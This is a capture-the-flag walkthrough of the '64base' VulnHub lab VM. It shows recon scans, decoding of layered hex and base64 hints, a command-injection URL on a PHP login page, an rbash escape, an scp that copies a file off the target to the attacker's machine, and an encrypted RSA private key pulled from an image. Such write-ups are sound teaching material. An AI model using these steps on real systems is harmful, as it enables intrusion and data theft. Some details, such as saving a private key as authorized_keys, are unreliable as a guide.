It's been a while since I've been able to work on a vulnhub image. I started looking at recent releases and came across 64base. This VM has a Star Wars theme which is always great. Plus, it was 3mrgnc3's first public VM so I had to check it out!
Flag1
We start off with running Netdiscover to find the IP address of this image:
eric@geoda:~/Documents/vulnhub/64base$ sudo netdiscover -r 192.168.56.0/24 -i vboxnet0
[sudo] password for eric:

 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:ac:0e:b4      1      60  PCS Systemtechnik GmbH
 192.168.56.103  08:00:27:68:e7:f8      1      60  PCS Systemtechnik GmbH
eric@geoda:~/Documents/vulnhub/64base$
Since the DHCP server is .100, we see that 192.168.56.103 is our target. Let's conduct an nmap scan against this to see what we are working with:
eric@geoda:~/Documents/vulnhub/64base$ sudo nmap -p- -sV 192.168.56.103

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-30 22:27 CDT
Nmap scan report for 192.168.56.103
Host is up (0.00012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
4899/tcp  open  radmin?
62964/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[...service fingerprints for ports 22 and 4899 omitted; the same banners are shown in the nc sessions below...]
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
eric@geoda:~/Documents/vulnhub/64base$
Very interesting. Looks like we are working with four open ports: 22, 80, 4899 and 62964.
I take a quick look at each:
First I check out port 22:
eric@geoda:/tmp$ nc -nv 192.168.56.103 22
(UNKNOWN) [192.168.56.103] 22 (ssh) open
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001

#
HI
HI
^C
eric@geoda:/tmp$
Appears to be SSH... or at least pretending to be: what comes back is a login banner, not the version string a real SSH server sends first.
I then check out port 4899:
eric@geoda:/tmp$ nc -nv 192.168.56.103 4899
(UNKNOWN) [192.168.56.103] 4899 (radmin-port) open
sshhh! ssh! droids!

So..

You found a way in then...

but, can you pop root?

[ASCII art: two droids, one asking "Did you hear that?"]
eric@geoda:/tmp$
This has 2 droids talking amongst each other, but I'm not sure exactly what this means. I will table this in case it comes in handy later.
I then check out port 62964:
eric@geoda:/tmp$ nc -nv 192.168.56.103 62964
(UNKNOWN) [192.168.56.103] 62964 (?) open
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
HI
Protocol mismatch.
eric@geoda:/tmp$
Now THIS looks like an SSH service. I will make note of this as my first SSH connection if it comes down to it.
Lastly, let's take a look at port 80. I fire up the browser:
Looking at the title, I see some text that appears to be encoded with base64. I take it to the terminal and decode:
eric@geoda:~/Documents/vulnhub/64base$ echo "dmlldyBzb3VyY2UgO0QK" | base64 -d
view source ;D
eric@geoda:~/Documents/vulnhub/64base$
It hints for me to view the source.
When checking the page source, I see a comment right below that same sub heading:
5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a
This value appears to be hexadecimal. The quickest way I can think of to decode it is via Burp.
So I fire it up and see that after decoding the hex value, it then produces a base64 string. I took that value and decoded it and we get our first flag!
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
Flag2
After finding flag1, I notice its contents are also in base64. I decode and I'm presented with the following:

eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==" | base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
eric@geoda:~/Documents/vulnhub/64base$
Based off this value, the first thing I think of is credentials. I immediately think of SSH and try logging in to the two "SSH" ports we found. Port 62964 turns out to be the one actually running the service, but the login attempt is unsuccessful.
After a ton of enumeration with dirb and Burp, I found a few rabbit holes among the paths that returned 200 status codes. I decided to read over the website a bit more, and figured that generating a wordlist from its content might help with further enumeration. I use wget to accomplish this.
I first pull down the first 2 levels of the website:
eric@geoda:~/Documents/vulnhub/64base$ wget -r -l 2 192.168.56.103
--2017-04-30 23:20:49--  http://192.168.56.103/
Connecting to 192.168.56.103:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8159 (8.0K) [text/html]
Saving to: ‘192.168.56.103/index.html’

192.168.56.103/index.html 100%[================================================================================================================>]   7.97K  --.-KB/s    in 0s

2017-04-30 23:20:49 (1.01 GB/s) - ‘192.168.56.103/index.html’ saved [8159/8159]

Loading robots.txt; please ignore errors.
--2017-04-30 23:20:49--  http://192.168.56.103/robots.txt
Reusing existing connection to 192.168.56.103:80.
HTTP request sent, awaiting response... 200 OK
Length: 8196 (8.0K) [text/plain]
Saving to: ‘192.168.56.103/robots.txt’

[...snippet...]

2017-04-30 23:20:49 (155 MB/s) - ‘192.168.56.103/img/contact-bg.jpg’ saved [95838/95838]

FINISHED --2017-04-30 23:20:49--
Total wall clock time: 0.03s
Downloaded: 31 files, 1.8M in 0.009s (198 MB/s)
eric@geoda:~/Documents/vulnhub/64base$
I then replace every whitespace character with a newline, sort, and keep one copy of each unique entry:
eric@geoda:~/Documents/vulnhub/64base$ grep -hr "" 192.168.56.103/| tr '[:space:]' '\n' | sort | uniq > wordlist.txt
Now we just have to drop the entries that contain HTML syntax or other stray punctuation:
egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.txt | sort -u > wordlist-clean.txt
We now have a custom wordlist based off the website:
eric@geoda:~/Documents/vulnhub/64base$ wc -l wordlist-clean.txt
26455 wordlist-clean.txt
eric@geoda:~/Documents/vulnhub/64base$
With our custom wordlist created, I turn to Burp and the Intruder to start running through it.
I look at all 200's, 300's and 400's. When searching I notice a 401 status code that caught my eye:
I see that the payload Imperial-Class gives a 401 status code indicating that we are unauthorized to view this page. I navigate to the page to see the reason why:
Ah-ha! A login screen. I remember the "credentials" that were given to us from flag1. I submit the credentials and I'm presented with a new page!
Interesting. So I check its page source and see the following message:
<!DOCTYPE html>
<html lang="en">
<body bgcolor=#000000><font color=#cfbf00>
<title>64base - login</title>
<h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
<!-- don't forget the BountyHunter login -->
Looks like a hint to me. But what? I added BountyHunter as the next path in the URL and I'm presented with a login screen:
Excellent! Another login screen. I try the same credentials that got me to this page to see if they work.
They failed.
However! When navigating to the page source, we notice a comment!
<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php">
<fieldset>
<legend>Please login:</legend>
<dl>
<dt>
<label title="Username">Username:
<input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" />
</label>
</dt>
</dl>
<dl>
<dt>
<label title="Password">Password:
<input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" />
</label>
</dt>
</dl>
<dl>
<dt>
<label title="Submit">
<input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" />
<!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
</label>
</dt>
</dl>
</fieldset>
</form>
There's a comment with "basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a"
I noticed it was in hex. I tried to decode it and it appeared to come back as base64. However, decoding that text only produced gibberish. After a while I noticed that the id attributes of the Username and Password inputs were hex as well. I decided to concatenate all three strings, in the order they appear in the form, and run the decode again:
Excellent! We have found flag2
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
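The hex-then-base64 nesting behind flag1 and the three-fragment trick behind flag2, as an added Python example (not the write-up's own code): it peels encoding layers until the result stops decoding cleanly, extracts the flagN{...} body and peels that too. The hex values are copied from the page; FLAG1_HEX is the comment under the sub heading, and BOUNTYHUNTER_FRAGMENTS are the two input ids and the basictoken in form order.

```python
from __future__ import annotations

import base64
import binascii
import re

# Values copied from the write-up: the hex comment under the page's sub heading (flag1),
# and the three hex fragments planted in the BountyHunter login form (flag2), listed in
# the order they appear in the form source.
FLAG1_HEX = (
    "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c46"
    "4953587055616b4a56576b644752574e7151586853534842575555684b6246"
    "524551586454656b5a77596d316a4d454e6e5054313943673d3d0a"
)
BOUNTYHUNTER_FRAGMENTS = [
    "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756",  # Username input id
    "584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32",  # Password input id
    "52714d544a54626d51315a45566157464655614446525557383966516f3d0a",  # basictoken comment
]

HEX_RE = re.compile(rb"[0-9a-fA-F]+")
B64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")
FLAG_RE = re.compile(rb"(flag\d)\{([^}]*)\}")


def _is_text(data: bytes) -> bool:
    """Accept a decode only if it yields printable ASCII. Every payload in this VM is text,
    and the check stops us from 'decoding' a plain word that merely looks like hex/base64."""
    return bool(data) and all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def peel(data: bytes, max_layers: int = 8) -> tuple[list[str], bytes]:
    """Strip hex and base64 layers until the data no longer decodes cleanly.

    Returns the layers removed (outermost first) and the innermost payload.
    """
    layers = []
    for _ in range(max_layers):
        s = data.strip()
        decoded, layer = None, None
        if HEX_RE.fullmatch(s) and len(s) % 2 == 0:
            decoded, layer = bytes.fromhex(s.decode()), "hex"
        elif B64_RE.fullmatch(s) and len(s) % 4 == 0:
            try:
                decoded, layer = base64.b64decode(s, validate=True), "base64"
            except binascii.Error:
                decoded = None
        if decoded is None or not _is_text(decoded):
            break
        data, layers = decoded, layers + [layer]
    return layers, data


def decode_flag(blob: bytes) -> tuple[str, bytes, bytes]:
    """Peel the outer layers, cut out the flagN{...} marker, then peel what it wraps.

    Returns (flag label, the flag exactly as found, the decoded inner payload).
    """
    _, outer = peel(blob)
    match = FLAG_RE.search(outer)
    if match is None:
        raise ValueError(f"no flag marker after decoding: {outer[:40]!r}")
    _, inner = peel(match.group(2))
    return match.group(1).decode(), match.group(0), inner.strip()


def decode_fragments(fragments: list[str]) -> tuple[str, bytes, bytes]:
    """The flag2 trick: on its own each fragment is an unusable slice of the base64 text
    (the basictoken alone is 30 base64 characters, not a whole number of quads); joined
    in page order they form one decodable string."""
    return decode_flag("".join(fragments).encode())


if __name__ == "__main__":
    for label, flag, inner in (decode_flag(FLAG1_HEX.encode()),
                               decode_fragments(BOUNTYHUNTER_FRAGMENTS)):
        print(label, flag.decode(), "->", inner.decode())
```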
Flag3
Again, we notice the contents of flag2 are base64 encoded. We decode and are presented with the following:

eric@geoda:~/Documents/vulnhub/64base$ echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA
eric@geoda:~/Documents/vulnhub/64base$
A youtube link. Interesting. I check it out and it appears to be calling for Burp.
I fire up Burp and start playing with the Intruder to see if I can find more information about this /Imperial-Class/BountyHunter/ directory.
I noticed that when I went directly to the /index.php directory, a 302 status code redirect was present. And what do we have here.. it's flag3!
flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
Flag4
Now that we have flag3, it appears to be yet another base64 encoded string. So I decode it:
eric@geoda:~/Documents/vulnhub/64base$ echo "NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=" | base64 -d
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
eric@geoda:~/Documents/vulnhub/64base$
Interesting. It appears to say "53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id"
I take this to the browser, however the page does not exist. Hmm. I remember that there was another page that referenced "53cr3t 5h377" which was the WANTED poster found on the main blog:
At the bottom it says "IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377"
I take a stab at it and update the URL to add the parameters f=exec&c=id which were the contents of the flag but replace exec with system instead:
http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=id
Ah-ha! It worked. I see flag4!
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Flag5
Now that we have flag4, it too looks like base64. I'm really starting to see a pattern here! I decode it and I'm left with:
eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 -d
64base:64base5h377
eric@geoda:~/Documents/vulnhub/64base$
This looks like credentials again. I try against SSH port 62964 but with no success.
eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password:
Permission denied, please try again.
64base@192.168.56.103's password:
eric@geoda:~/Documents/vulnhub/64base$
After thinking long and hard, I remember that this VM leans heavily on base64 encoding. I decide to base64-encode the password "64base5h377" and try to log in again:
eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password:
Last login: Tue Apr 25 18:26:31 2017 from 192.168.56.1
64base@64base:~$
Success!! I am on the box! Now to begin enumerating around.
The first thing I notice is the restricted shell and lack of commands I can use:
eric@geoda:~$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password:
Last login: Mon May  1 11:04:18 2017 from 192.168.56.1
64base@64base:~$ clear
-rbash: clear: command not found
64base@64base:~$ ls
well_done_:D
64base@64base:~$ cd /
-rbash: cd: restricted
64base@64base:~$ find / -iname flag5
[ASCII art: Cybot Galactica's AC1 "Spy-Eye" Surveillance Droid]
64base@64base:~$ whoami
-rbash: whoami: command not found
64base@64base:~$ pwd
/64base
64base@64base:~$ id
-rbash: id: command not found
64base@64base:~$ ls -lah
well_done_:D
64base@64base:~$
As you can see, I tried whoami, id, ls, find, cd and many more which I don't have shown.
What is a restricted shell anyway? Essentially, it limits what the user can do by allowing only a subset of commands to be executed.
I did some research and found a great write-up by SANS on escaping restricted linux shells:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
The first thing they recommend is to run the "env" command to understand how your profile is configured. So, that's exactly what I do:
64base@64base:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=192.168.56.1 51084 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=[...snipped...]
MAIL=/var/mail/64base
PATH=/var/alt-bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=1
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964
_=/var/alt-bin/env
64base@64base:~$
Interesting, it looks like a custom PATH=/var/alt-bin. Usually you would run ls to list the contents of the directory, but even in a restricted shell the echo builtin with an asterisk will 'glob' the directory contents, since wildcard expansion is done by the shell itself:
64base@64base:~$ echo /var/alt-bin/*
/var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/dircolors /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail
64base@64base:~$
Usually, once you know which commands you can execute, you would research each one of them to see if there are known shell escapes associated with it. However, a particular file caught my eye: /var/alt-bin/droids
I run it to see what happens:
64base@64base:~$ /var/alt-bin/droids
-rbash: /var/alt-bin/droids: restricted: cannot specify `/' in command names
64base@64base:~$
Bah! That didn't work. But how about just "droids"? Since it is found directly in my $PATH, I should be able to run droids by itself without specifying the full path.
I type droids and all of a sudden I'm presented with the matrix:
I was able to escape with ctrl + c and now I'm presented with an ASCII image:
64base@64base:~$ droids

So..

You found a way in then...

but, can you pop root?

[ASCII art: the same two droids seen on port 4899]
64base@64base:~$
Interesting. What just happened? I get the urge to run env again, since that is where I found the droids path, and I'm presented with a properly updated $PATH!
64base@64base:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=192.168.56.1 51084 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=[...snipped...]
MAIL=/var/mail/64base
PATH=/var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=3
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964
_=/var/alt-bin/env
64base@64base:~$
I then use find to look for flag5 again:
64base@64base:~$ /usr/bin/find / -name *flag5* 2>/dev/null
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
64base@64base:~$
Excellent! I found flag5:
flag5{TG9vayBJbnNpZGUhIDpECg==}
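The lesson of this section, as an added example (not the write-up's or the VM author's code): rbash refuses cd, command names containing a slash, changes to PATH or SHELL and output redirection, but it says nothing about what the allow-listed programs themselves can do. This audit, run against a constructed temp directory populated with the names from the echo glob above, flags interpreters, programs that can start other processes, PATH entries outside the allow-list directory (exactly what droids introduced), and writable or setuid entries.

```python
from __future__ import annotations

import os
import stat
import tempfile

# Allow-listed names that defeat the restriction on their own. Both sets are limited to
# what is visible in /var/alt-bin on 64base: interpreters run arbitrary code; env, find
# (-exec), less and more all have a built-in way to launch another program.
INTERPRETERS = {"perl", "python", "ruby", "awk"}
LAUNCHERS = {"env", "find", "less", "more"}

ALT_BIN_64BASE = ("awk base64 cat dircolors droids egrep env fgrep file find grep head "
                  "less ls more perl python ruby tail").split()
PATH_BEFORE_DROIDS = "/var/alt-bin"
PATH_AFTER_DROIDS = "/var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def audit_restricted_shell(bin_dir: str, path_env: str, shell: str) -> list[str]:
    """Return findings for one restricted account; an empty list means nothing obvious."""
    findings = []
    if os.path.basename(shell) != "rbash":
        findings.append(f"login shell is {shell}, not rbash")
    for entry in path_env.split(":"):
        if entry != bin_dir:
            findings.append(f"PATH entry {entry} lies outside the allow-list directory")
    if os.stat(bin_dir).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{bin_dir} is group/world writable: the user can add commands")
    for name in sorted(os.listdir(bin_dir)):
        mode = os.stat(os.path.join(bin_dir, name)).st_mode
        if name in INTERPRETERS:
            findings.append(f"{name}: interpreter, runs arbitrary code")
        elif name in LAUNCHERS:
            findings.append(f"{name}: can start other programs")
        if mode & (stat.S_ISUID | stat.S_ISGID):
            findings.append(f"{name}: setuid/setgid")
        if mode & stat.S_IWOTH:
            findings.append(f"{name}: world writable")
    return findings


def make_fake_bin_dir(names: list[str], dir_mode: int = 0o755) -> str:
    """Constructed stand-in for /var/alt-bin: empty placeholder files that are never run."""
    bin_dir = tempfile.mkdtemp(prefix="alt-bin-")
    for name in names:
        path = os.path.join(bin_dir, name)
        open(path, "w").close()
        os.chmod(path, 0o755)
    os.chmod(bin_dir, dir_mode)
    return bin_dir


def audit_64base(path_env: str = PATH_BEFORE_DROIDS) -> list[str]:
    """Audit the 64base listing; the temp dir stands in for /var/alt-bin inside PATH too."""
    bin_dir = make_fake_bin_dir(ALT_BIN_64BASE)
    return audit_restricted_shell(bin_dir, path_env.replace("/var/alt-bin", bin_dir), "/bin/rbash")


if __name__ == "__main__":
    print("before droids:", *audit_64base(), sep="\n  ")
    print("after droids:", *audit_64base(PATH_AFTER_DROIDS), sep="\n  ")
    tight = make_fake_bin_dir(["cat", "base64", "ls", "head", "tail", "grep"])
    print("tightened allow-list:", audit_restricted_shell(tight, tight, "/bin/rbash"))
```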
Flag6
Per usual, I decode flag5:

64base@64base:~$ echo "TG9vayBJbnNpZGUhIDpECg==" | base64 -d
Look Inside! :D
64base@64base:~$
It is telling me to look inside. What does that mean? I run file on flag5 to see what they mean:
64base@64base:~$ file /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3
64base@64base:~$
Looks like this is a JPEG image! It also has a weird comment that appears to be in hex. After reversing the hex with xxd, I notice that the result is, of course, base64! I decode that too:
64base@64base:~$ echo "4c5330744c5331435255644a546942535530456755464a4a566b4655525342" | xxd -p -r | base64 -d
-----BEGIN RSA PRIVATE
base64: invalid input
64base@64base:~$
Ah-ha! It looks like the comment is the beginning of an RSA private key! Now, the real question is.. how do I extract the entire contents of this image? Usually I would run exiftool against the image, but it is not installed on the box.
My next idea is downloading the image locally and examining the file.
So, I start my SSH Server:
eric@geoda:~$ sudo service ssh status
● ssh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
   Active: active (running) since Tue 2017-05-02 21:04:37 CDT; 1min 18s ago
 Main PID: 6625 (sshd)
    Tasks: 1 (limit: 4915)
   CGroup: /system.slice/ssh.service
           └─6625 /usr/sbin/sshd -D

May 02 21:04:37 geoda systemd[1]: Starting OpenBSD Secure Shell server...
May 02 21:04:37 geoda sshd[6625]: Server listening on 0.0.0.0 port 22.
May 02 21:04:37 geoda sshd[6625]: Server listening on :: port 22.
May 02 21:04:37 geoda systemd[1]: Started OpenBSD Secure Shell server.
eric@geoda:~$
and SCP the file on over:
64base@64base:~$ scp /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} eric@192.168.56.1:/tmp/flag5.jpg
Could not create directory '/64base/.ssh'.
The authenticity of host '192.168.56.1 (192.168.56.1)' can't be established.
ECDSA key fingerprint is 45:44:10:d9:e9:16:02:8b:86:b7:fc:b2:5b:a1:4c:10.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
eric@192.168.56.1's password:
flag5{TG9vayBJbnNpZGUhIDpECg==}                100%  192KB 192.0KB/s   00:00
64base@64base:~$
Now that the file has been copied down, I give myself read rights and I run exiftool to completely examine the JPEG:
eric@geoda:/tmp$ ls -lah flag5.jpg
-------r-- 1 eric eric 192K May  2 21:07 flag5.jpg
eric@geoda:/tmp$ chmod +r flag5.jpg
eric@geoda:/tmp$ exiftool flag5.jpg
ExifTool Version Number         : 10.40
File Name                       : flag5.jpg
Directory                       : .
File Size                       : 192 kB
File Modification Date/Time     : 2017:05:02 21:07:52-05:00
File Access Date/Time           : 2017:05:02 21:07:52-05:00
File Inode Change Date/Time     : 2017:05:02 21:10:34-05:00
File Permissions                : r--r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Comment                         : [...long hex string, decoded below...]
Image Width                     : 960
Image Height                    : 720
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 960x720
Megapixels                      : 0.691
eric@geoda:/tmp$
I then take the contents of the Comment field and run xxd and decode in base64 again:
eric@geoda:/tmp$ echo "[...full hex string from the Comment field...]" | xxd -p -r | base64 -d
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

[...base64 key body omitted...]
-----END RSA PRIVATE KEY-----
eric@geoda:/tmp$
Nice! As expected, this was in fact an RSA Private Key!!
I echo this into my authorized_keys file and strip all permissions except read access for my own user:
eric@geoda:/tmp$ echo "-----BEGIN RSA PRIVATE KEY----- > Proc-Type: 4,ENCRYPTED > DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C > > mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6 > YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz > 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0 > kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse > MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH > k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob > wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL > guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw > TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd > 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv > AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG > 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx > +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs > fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi > +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz > 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV > rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt > Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE > Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI > Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG > Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj > qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3 > 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P > fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t > /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP > -----END RSA PRIVATE KEY----- > " > ~/.ssh/authorized_keys eric@geoda:/tmp$ chmod 0400 ~/.ssh/authorized_keys
With the key file set up, I try to log in as root:
eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys Enter passphrase for key '/home/eric/.ssh/authorized_keys': root@192.168.56.103's password: Permission denied, please try again. root@192.168.56.103's password: Permission denied, please try again. root@192.168.56.103's password: Permission denied (publickey,password). eric@geoda:/tmp$
So close! Looks like it still requires a password. But what's my password? I realized that the file I had copied down was a JPEG that I had never actually viewed.
It's a picture with the words "Use the Force". I bet this is the password! I tried several variations, and "usetheforce" was the correct one!
